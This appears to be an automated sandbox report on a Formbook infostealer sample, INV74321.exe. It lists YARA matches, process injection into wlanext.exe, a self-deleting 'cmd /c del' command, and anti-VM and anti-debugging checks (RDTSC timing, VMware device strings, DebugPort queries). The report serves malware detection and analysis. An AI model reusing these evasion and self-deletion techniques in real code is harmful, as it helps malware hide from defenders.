          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@16/7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
          Source: C:\Users\user\Desktop\INV74321.exeFile created: C:\Users\user\AppData\Local\Temp\nso60E4.tmpJump to behavior
          Source: INV74321.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INV74321.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: INV74321.exeVirustotal: Detection: 30%
          Source: INV74321.exeMetadefender: Detection: 14%
          Source: INV74321.exeReversingLabs: Detection: 72%
          Source: C:\Users\user\Desktop\INV74321.exeFile read: C:\Users\user\Desktop\INV74321.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'Jump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: INV74321.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV74321.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\INV74321.exeUnpacked PE file: 1.2.INV74321.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0040102D pushfd ; ret 1_2_0040102E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004160CD push 00000033h; iretd 1_2_004160F6
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004161E9 push es; retf 1_2_00416257
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041624E push es; retf 1_2_00416257
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00418F45 push es; ret 1_2_00418F4B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041CFEE push dword ptr [C5AA8973h]; retn EADCh1_2_0041D044
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B2D0D1 push ecx; ret 1_2_00B2D0E4
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0040102D pushfd ; ret 1_1_0040102E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004160CD push 00000033h; iretd 1_1_004160F6
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004161E9 push es; retf 1_1_00416257
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041624E push es; retf 1_1_00416257
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B3B5 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B46C push eax; ret 1_1_0041B472
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B402 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B40B push eax; ret 1_1_0041B472
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0379D0D1 push ecx; ret 8_2_0379D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CC381 pushad ; retf 8_2_030CC382
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB3B5 push eax; ret 8_2_030CB408
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C624E push es; retf 8_2_030C6257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C61E9 push es; retf 8_2_030C6257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C60CD push 00000033h; iretd 8_2_030C60F6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C8F45 push es; ret 8_2_030C8F4B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB40B push eax; ret 8_2_030CB472
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB402 push eax; ret 8_2_030CB408
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB46C push eax; ret 8_2_030CB472
          Source: C:\Users\user\Desktop\INV74321.exeFile created: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dllJump to dropped file
          Source: C:\Users\user\Desktop\INV74321.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\INV74321.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000030B85E4 second address: 00000000030B85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000030B897E second address: 00000000030B8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 5468Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6748Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.231378455.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.231773140.0000000004E61000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.237953316.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.233054387.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.239170353.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.484763017.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.242904889.00000000089C5000.00000004.00000001.sdmpBinary or memory string: qeMusic
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INV74321.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]0_2_10001000
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_023F17F3 mov eax, dword ptr fs:[00000030h]0_2_023F17F3
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_023F15DB mov eax, dword ptr fs:[00000030h]0_2_023F15DB
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]1_2_00B0F0BF
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0F0BF mov eax, dword ptr fs:[00000030h]1_2_00B0F0BF
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0F0BF mov eax, dword ptr fs:[00000030h]1_2_00B0F0BF
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B190AF mov eax, dword ptr fs:[00000030h]1_2_00B190AF
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9080 mov eax, dword ptr fs:[00000030h]1_2_00AD9080
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53884 mov eax, dword ptr fs:[00000030h]1_2_00B53884
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53884 mov eax, dword ptr fs:[00000030h]1_2_00B53884
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD58EC mov eax, dword ptr fs:[00000030h]1_2_00AD58EC
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B6B8D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B6B8D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B6B8D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B6B8D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B6B8D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B6B8D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]1_2_00AEB02A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]1_2_00AEB02A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]1_2_00AEB02A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]1_2_00AEB02A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]1_2_00B0002D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]1_2_00B0002D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]1_2_00B0002D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]1_2_00B0002D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]1_2_00B0002D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]1_2_00B57016
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]1_2_00B57016
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]1_2_00B57016
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA4015 mov eax, dword ptr fs:[00000030h]1_2_00BA4015
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA4015 mov eax, dword ptr fs:[00000030h]1_2_00BA4015
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B92073 mov eax, dword ptr fs:[00000030h]1_2_00B92073
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA1074 mov eax, dword ptr fs:[00000030h]1_2_00BA1074
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF0050 mov eax, dword ptr fs:[00000030h]1_2_00AF0050
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF0050 mov eax, dword ptr fs:[00000030h]1_2_00AF0050
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]1_2_00B551BE
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]1_2_00B551BE
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]1_2_00B551BE
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]1_2_00B551BE
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B061A0 mov eax, dword ptr fs:[00000030h]1_2_00B061A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B061A0 mov eax, dword ptr fs:[00000030h]1_2_00B061A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B569A6 mov eax, dword ptr fs:[00000030h]1_2_00B569A6
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02990 mov eax, dword ptr fs:[00000030h]1_2_00B02990
